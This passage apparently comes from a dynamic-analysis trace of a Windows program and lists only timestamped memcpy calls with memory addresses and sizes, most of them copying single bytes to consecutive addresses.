_Dst=0x41cfbe) returned 0x41cfbe [0076.571] memcpy (in: _Dst=0x41cfbc, _Src=0x2f4fa0c, _Size=0x20 | out: _Dst=0x41cfbc) returned 0x41cfbc [0076.571] memcpy (in: _Dst=0x2f4f9a4, _Src=0x2f4fa0c, _Size=0x20 | out: _Dst=0x2f4f9a4) returned 0x2f4f9a4 [0076.571] memcpy (in: _Dst=0x2f4fa58, _Src=0x2f4fa0c, _Size=0x20 | out: _Dst=0x2f4fa58) returned 0x2f4fa58 [0076.571] memcpy (in: _Dst=0x2f4fa78, _Src=0x2f4fc70, _Size=0x10 | out: _Dst=0x2f4fa78) returned 0x2f4fa78 [0076.571] memcpy (in: _Dst=0x2f4f84c, _Src=0x2f4fa58, _Size=0x30 | out: _Dst=0x2f4f84c) returned 0x2f4f84c [0076.571] memcpy (in: _Dst=0x2f4fde8, _Src=0x41d198, _Size=0x0 | out: _Dst=0x2f4fde8) returned 0x2f4fde8 [0076.572] memcpy (in: _Dst=0x206b8a4, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8a4) returned 0x206b8a4 [0076.572] memcpy (in: _Dst=0x206b8a5, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8a5) returned 0x206b8a5 [0076.572] memcpy (in: _Dst=0x206b8a6, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8a6) returned 0x206b8a6 [0076.572] memcpy (in: _Dst=0x206b8a7, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8a7) returned 0x206b8a7 [0076.572] memcpy (in: _Dst=0x206b8a8, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8a8) returned 0x206b8a8 [0076.572] memcpy (in: _Dst=0x206b8a9, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8a9) returned 0x206b8a9 [0076.573] memcpy (in: _Dst=0x206b8aa, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8aa) returned 0x206b8aa [0076.573] memcpy (in: _Dst=0x206b8ab, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ab) returned 0x206b8ab [0076.573] memcpy (in: _Dst=0x206b8ac, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ac) returned 0x206b8ac [0076.573] memcpy (in: _Dst=0x206b8ad, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ad) returned 0x206b8ad [0076.573] memcpy (in: _Dst=0x206b8ae, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ae) returned 0x206b8ae [0076.573] memcpy (in: _Dst=0x206b8af, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8af) returned 0x206b8af [0076.573] memcpy (in: _Dst=0x206b8b0, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b0) returned 0x206b8b0 [0076.574] memcpy (in: _Dst=0x206b8b1, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b1) returned 0x206b8b1 [0076.574] memcpy (in: _Dst=0x206b8b2, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b2) returned 0x206b8b2 [0076.574] memcpy (in: _Dst=0x206b8b3, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b3) returned 0x206b8b3 [0076.574] memcpy (in: _Dst=0x206b8b4, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b4) returned 0x206b8b4 [0076.574] memcpy (in: _Dst=0x206b8b5, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b5) returned 0x206b8b5 [0076.574] memcpy (in: _Dst=0x206b8b6, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b6) returned 0x206b8b6 [0076.575] memcpy (in: _Dst=0x206b8b7, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b7) returned 0x206b8b7 [0076.575] memcpy (in: _Dst=0x206b8b8, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b8) returned 0x206b8b8 [0076.575] memcpy (in: _Dst=0x206b8b9, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8b9) returned 0x206b8b9 [0076.575] memcpy (in: _Dst=0x206b8ba, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ba) returned 0x206b8ba [0076.575] memcpy (in: _Dst=0x206b8bb, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8bb) returned 0x206b8bb [0076.575] memcpy (in: _Dst=0x206b8bc, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8bc) returned 0x206b8bc [0076.576] memcpy (in: _Dst=0x206b8bd, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8bd) returned 0x206b8bd [0076.576] memcpy (in: _Dst=0x206b8be, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8be) returned 0x206b8be [0076.576] memcpy (in: _Dst=0x206b8bf, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8bf) returned 0x206b8bf [0076.576] memcpy (in: _Dst=0x206b8c0, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c0) returned 0x206b8c0 [0076.576] memcpy (in: _Dst=0x206b8c1, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c1) returned 0x206b8c1 [0076.576] memcpy (in: _Dst=0x206b8c2, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c2) returned 0x206b8c2 [0076.577] memcpy (in: _Dst=0x206b8c3, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c3) returned 0x206b8c3 [0076.577] memcpy (in: _Dst=0x206b8c4, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c4) returned 0x206b8c4 [0076.577] memcpy (in: _Dst=0x206b8c5, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c5) returned 0x206b8c5 [0076.577] memcpy (in: _Dst=0x206b8c6, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c6) returned 0x206b8c6 [0076.577] memcpy (in: _Dst=0x206b8c7, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c7) returned 0x206b8c7 [0076.577] memcpy (in: _Dst=0x206b8c8, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c8) returned 0x206b8c8 [0076.577] memcpy (in: _Dst=0x206b8c9, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8c9) returned 0x206b8c9 [0076.578] memcpy (in: _Dst=0x206b8ca, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ca) returned 0x206b8ca [0076.578] memcpy (in: _Dst=0x206b8cb, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8cb) returned 0x206b8cb [0076.578] memcpy (in: _Dst=0x206b8cc, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8cc) returned 0x206b8cc [0076.578] memcpy (in: _Dst=0x206b8cd, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8cd) returned 0x206b8cd [0076.578] memcpy (in: _Dst=0x206b8ce, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ce) returned 0x206b8ce [0076.578] memcpy (in: _Dst=0x206b8cf, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8cf) returned 0x206b8cf [0076.579] memcpy (in: _Dst=0x206b8d0, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d0) returned 0x206b8d0 [0076.579] memcpy (in: _Dst=0x206b8d1, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d1) returned 0x206b8d1 [0076.579] memcpy (in: _Dst=0x206b8d2, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d2) returned 0x206b8d2 [0076.579] memcpy (in: _Dst=0x206b8d3, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d3) returned 0x206b8d3 [0076.579] memcpy (in: _Dst=0x206b8d4, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d4) returned 0x206b8d4 [0076.579] memcpy (in: _Dst=0x206b8d5, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d5) returned 0x206b8d5 [0076.579] memcpy (in: _Dst=0x206b8d6, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d6) returned 0x206b8d6 [0076.579] memcpy (in: _Dst=0x206b8d7, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d7) returned 0x206b8d7 [0076.579] memcpy (in: _Dst=0x206b8d8, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d8) returned 0x206b8d8 [0076.579] memcpy (in: _Dst=0x206b8d9, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8d9) returned 0x206b8d9 [0076.579] memcpy (in: _Dst=0x206b8da, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8da) returned 0x206b8da [0076.579] memcpy (in: _Dst=0x206b8db, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8db) returned 0x206b8db [0076.579] memcpy (in: _Dst=0x206b8dc, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8dc) returned 0x206b8dc [0076.580] memcpy (in: _Dst=0x206b8dd, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8dd) returned 0x206b8dd [0076.580] memcpy (in: _Dst=0x206b8de, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8de) returned 0x206b8de [0076.580] memcpy (in: _Dst=0x206b8df, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8df) returned 0x206b8df [0076.580] memcpy (in: _Dst=0x206b8e0, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e0) returned 0x206b8e0 [0076.580] memcpy (in: _Dst=0x206b8e1, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e1) returned 0x206b8e1 [0076.580] memcpy (in: _Dst=0x206b8e2, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e2) returned 0x206b8e2 [0076.580] memcpy (in: _Dst=0x206b8e3, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e3) returned 0x206b8e3 [0076.580] memcpy (in: _Dst=0x206b8e4, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e4) returned 0x206b8e4 [0076.580] memcpy (in: _Dst=0x206b8e5, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e5) returned 0x206b8e5 [0076.580] memcpy (in: _Dst=0x206b8e6, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e6) returned 0x206b8e6 [0076.580] memcpy (in: _Dst=0x206b8e7, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e7) returned 0x206b8e7 [0076.580] memcpy (in: _Dst=0x206b8e8, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e8) returned 0x206b8e8 [0076.580] memcpy (in: _Dst=0x206b8e9, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8e9) returned 0x206b8e9 [0076.580] memcpy (in: _Dst=0x206b8ea, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ea) returned 0x206b8ea [0076.580] memcpy (in: _Dst=0x206b8eb, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8eb) returned 0x206b8eb [0076.580] memcpy (in: _Dst=0x206b8ec, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ec) returned 0x206b8ec [0076.581] memcpy (in: _Dst=0x206b8ed, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ed) returned 0x206b8ed [0076.581] memcpy (in: _Dst=0x206b8ee, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ee) returned 0x206b8ee [0076.581] memcpy (in: _Dst=0x206b8ef, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ef) returned 0x206b8ef [0076.581] memcpy (in: _Dst=0x206b8f0, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f0) returned 0x206b8f0 [0076.581] memcpy (in: _Dst=0x206b8f1, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f1) returned 0x206b8f1 [0076.581] memcpy (in: _Dst=0x206b8f2, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f2) returned 0x206b8f2 [0076.581] memcpy (in: _Dst=0x206b8f3, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f3) returned 0x206b8f3 [0076.581] memcpy (in: _Dst=0x206b8f4, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f4) returned 0x206b8f4 [0076.581] memcpy (in: _Dst=0x206b8f5, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f5) returned 0x206b8f5 [0076.581] memcpy (in: _Dst=0x206b8f6, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f6) returned 0x206b8f6 [0076.581] memcpy (in: _Dst=0x206b8f7, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f7) returned 0x206b8f7 [0076.581] memcpy (in: _Dst=0x206b8f8, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f8) returned 0x206b8f8 [0076.581] memcpy (in: _Dst=0x206b8f9, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8f9) returned 0x206b8f9 [0076.581] memcpy (in: _Dst=0x206b8fa, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8fa) returned 0x206b8fa [0076.581] memcpy (in: _Dst=0x206b8fb, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8fb) returned 0x206b8fb [0076.581] memcpy (in: _Dst=0x206b8fc, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8fc) returned 0x206b8fc [0076.581] memcpy (in: _Dst=0x206b8fd, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8fd) returned 0x206b8fd [0076.581] memcpy (in: _Dst=0x206b8fe, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8fe) returned 0x206b8fe [0076.581] memcpy (in: _Dst=0x206b8ff, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b8ff) returned 0x206b8ff [0076.581] memcpy (in: _Dst=0x206b900, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b900) returned 0x206b900 [0076.581] memcpy (in: _Dst=0x206b901, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b901) returned 0x206b901 [0076.582] memcpy (in: _Dst=0x206b902, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b902) returned 0x206b902 [0076.582] memcpy (in: _Dst=0x206b903, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b903) returned 0x206b903 [0076.582] memcpy (in: _Dst=0x206b904, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b904) returned 0x206b904 [0076.582] memcpy (in: _Dst=0x206b905, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b905) returned 0x206b905 [0076.584] memcpy (in: _Dst=0x206b906, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b906) returned 0x206b906 [0076.584] memcpy (in: _Dst=0x206b907, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b907) returned 0x206b907 [0076.584] memcpy (in: _Dst=0x206b908, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b908) returned 0x206b908 [0076.584] memcpy (in: _Dst=0x206b909, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b909) returned 0x206b909 [0076.584] memcpy (in: _Dst=0x206b90a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b90a) returned 0x206b90a [0076.584] memcpy (in: _Dst=0x206b90b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b90b) returned 0x206b90b [0076.584] memcpy (in: _Dst=0x206b90c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b90c) returned 0x206b90c [0076.584] memcpy (in: _Dst=0x206b90d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b90d) returned 0x206b90d [0076.584] memcpy (in: _Dst=0x206b90e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b90e) returned 0x206b90e [0076.584] memcpy (in: _Dst=0x206b90f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b90f) returned 0x206b90f [0076.585] memcpy (in: _Dst=0x206b910, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b910) returned 0x206b910 [0076.585] memcpy (in: _Dst=0x206b911, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b911) returned 0x206b911 [0076.585] memcpy (in: _Dst=0x206b912, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b912) returned 0x206b912 [0076.585] memcpy (in: _Dst=0x206b913, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b913) returned 0x206b913 [0076.585] memcpy (in: _Dst=0x206b914, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b914) returned 0x206b914 [0076.585] memcpy (in: _Dst=0x206b915, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b915) returned 0x206b915 [0076.585] memcpy (in: _Dst=0x206b916, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b916) returned 0x206b916 [0076.585] memcpy (in: _Dst=0x206b917, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b917) returned 0x206b917 [0076.585] memcpy (in: _Dst=0x206b918, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b918) returned 0x206b918 [0076.585] memcpy (in: _Dst=0x206b919, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b919) returned 0x206b919 [0076.585] memcpy (in: _Dst=0x206b91a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b91a) returned 0x206b91a [0076.585] memcpy (in: _Dst=0x206b91b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b91b) returned 0x206b91b [0076.585] memcpy (in: _Dst=0x206b91c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b91c) returned 0x206b91c [0076.585] memcpy (in: _Dst=0x206b91d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b91d) returned 0x206b91d [0076.585] memcpy (in: _Dst=0x206b91e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b91e) returned 0x206b91e [0076.585] memcpy (in: _Dst=0x206b91f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b91f) returned 0x206b91f [0076.585] memcpy (in: _Dst=0x206b920, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b920) returned 0x206b920 [0076.585] memcpy (in: _Dst=0x206b921, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b921) returned 0x206b921 [0076.585] memcpy (in: _Dst=0x206b922, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b922) returned 0x206b922 [0076.586] memcpy (in: _Dst=0x206b923, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b923) returned 0x206b923 [0076.586] memcpy (in: _Dst=0x206b924, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b924) returned 0x206b924 [0076.586] memcpy (in: _Dst=0x206b925, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b925) returned 0x206b925 [0076.586] memcpy (in: _Dst=0x206b926, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b926) returned 0x206b926 [0076.586] memcpy (in: _Dst=0x206b927, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b927) returned 0x206b927 [0076.586] memcpy (in: _Dst=0x206b928, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b928) returned 0x206b928 [0076.586] memcpy (in: _Dst=0x206b929, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b929) returned 0x206b929 [0076.586] memcpy (in: _Dst=0x206b92a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b92a) returned 0x206b92a [0076.586] memcpy (in: _Dst=0x206b92b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b92b) returned 0x206b92b [0076.586] memcpy (in: _Dst=0x206b92c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b92c) returned 0x206b92c [0076.586] memcpy (in: _Dst=0x206b92d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b92d) returned 0x206b92d [0076.586] memcpy (in: _Dst=0x206b92e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b92e) returned 0x206b92e [0076.586] memcpy (in: _Dst=0x206b92f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b92f) returned 0x206b92f [0076.586] memcpy (in: _Dst=0x206b930, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b930) returned 0x206b930 [0076.586] memcpy (in: _Dst=0x206b931, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b931) returned 0x206b931 [0076.586] memcpy (in: _Dst=0x206b932, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b932) returned 0x206b932 [0076.586] memcpy (in: _Dst=0x206b933, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b933) returned 0x206b933 [0076.586] memcpy (in: _Dst=0x206b934, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b934) returned 0x206b934 [0076.586] memcpy (in: _Dst=0x206b935, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b935) returned 0x206b935 [0076.587] memcpy (in: _Dst=0x206b936, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b936) returned 0x206b936 [0076.587] memcpy (in: _Dst=0x206b937, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b937) returned 0x206b937 [0076.587] memcpy (in: _Dst=0x206b938, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b938) returned 0x206b938 [0076.587] memcpy (in: _Dst=0x206b939, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b939) returned 0x206b939 [0076.587] memcpy (in: _Dst=0x206b93a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b93a) returned 0x206b93a [0076.587] memcpy (in: _Dst=0x206b93b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b93b) returned 0x206b93b [0076.587] memcpy (in: _Dst=0x206b93c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b93c) returned 0x206b93c [0076.587] memcpy (in: _Dst=0x206b93d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b93d) returned 0x206b93d [0076.587] memcpy (in: _Dst=0x206b93e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b93e) returned 0x206b93e [0076.587] memcpy (in: _Dst=0x206b93f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b93f) returned 0x206b93f [0076.587] memcpy (in: _Dst=0x206b940, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b940) returned 0x206b940 [0076.587] memcpy (in: _Dst=0x206b941, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b941) returned 0x206b941 [0076.587] memcpy (in: _Dst=0x206b942, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b942) returned 0x206b942 [0076.587] memcpy (in: _Dst=0x206b943, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b943) returned 0x206b943 [0076.587] memcpy (in: _Dst=0x206b944, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b944) returned 0x206b944 [0076.587] memcpy (in: _Dst=0x206b945, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b945) returned 0x206b945 [0076.587] memcpy (in: _Dst=0x206b946, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b946) returned 0x206b946 [0076.588] memcpy (in: _Dst=0x206b947, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b947) returned 0x206b947 [0076.588] memcpy (in: _Dst=0x206b948, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b948) returned 0x206b948 [0076.588] memcpy (in: _Dst=0x206b949, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b949) returned 0x206b949 [0076.588] memcpy (in: _Dst=0x206b94a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b94a) returned 0x206b94a [0076.588] memcpy (in: _Dst=0x206b94b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b94b) returned 0x206b94b [0076.588] memcpy (in: _Dst=0x206b94c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b94c) returned 0x206b94c [0076.588] memcpy (in: _Dst=0x206b94d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b94d) returned 0x206b94d [0076.588] memcpy (in: _Dst=0x206b94e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b94e) returned 0x206b94e [0076.588] memcpy (in: _Dst=0x206b94f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b94f) returned 0x206b94f [0076.588] memcpy (in: _Dst=0x206b950, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b950) returned 0x206b950 [0076.588] memcpy (in: _Dst=0x206b951, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b951) returned 0x206b951 [0076.588] memcpy (in: _Dst=0x206b952, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b952) returned 0x206b952 [0076.588] memcpy (in: _Dst=0x206b953, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b953) returned 0x206b953 [0076.588] memcpy (in: _Dst=0x206b954, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b954) returned 0x206b954 [0076.588] memcpy (in: _Dst=0x206b955, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b955) returned 0x206b955 [0076.589] memcpy (in: _Dst=0x206b956, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b956) returned 0x206b956 [0076.590] memcpy (in: _Dst=0x206b957, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b957) returned 0x206b957 [0076.590] memcpy (in: _Dst=0x206b958, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b958) returned 0x206b958 [0076.590] memcpy (in: _Dst=0x206b959, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b959) returned 0x206b959 [0076.590] memcpy (in: _Dst=0x206b95a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b95a) returned 0x206b95a [0076.590] memcpy (in: _Dst=0x206b95b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b95b) returned 0x206b95b [0076.590] memcpy (in: _Dst=0x206b95c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b95c) returned 0x206b95c [0076.590] memcpy (in: _Dst=0x206b95d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b95d) returned 0x206b95d [0076.590] memcpy (in: _Dst=0x206b95e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b95e) returned 0x206b95e [0076.590] memcpy (in: _Dst=0x206b95f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b95f) returned 0x206b95f [0076.590] memcpy (in: _Dst=0x206b960, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b960) returned 0x206b960 [0076.590] memcpy (in: _Dst=0x206b961, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b961) returned 0x206b961 [0076.590] memcpy (in: _Dst=0x206b962, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b962) returned 0x206b962 [0076.590] memcpy (in: _Dst=0x206b963, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b963) returned 0x206b963 [0076.590] memcpy (in: _Dst=0x206b964, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b964) returned 0x206b964 [0076.590] memcpy (in: _Dst=0x206b965, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b965) returned 0x206b965 [0076.590] memcpy (in: _Dst=0x206b966, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b966) returned 0x206b966 [0076.590] memcpy (in: _Dst=0x206b967, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b967) returned 0x206b967 [0076.590] memcpy (in: _Dst=0x206b968, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b968) returned 0x206b968 [0076.591] memcpy (in: _Dst=0x206b969, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b969) returned 0x206b969 [0076.591] memcpy (in: _Dst=0x206b96a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b96a) returned 0x206b96a [0076.591] memcpy (in: _Dst=0x206b96b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b96b) returned 0x206b96b [0076.591] memcpy (in: _Dst=0x206b96c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b96c) returned 0x206b96c [0076.591] memcpy (in: _Dst=0x206b96d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b96d) returned 0x206b96d 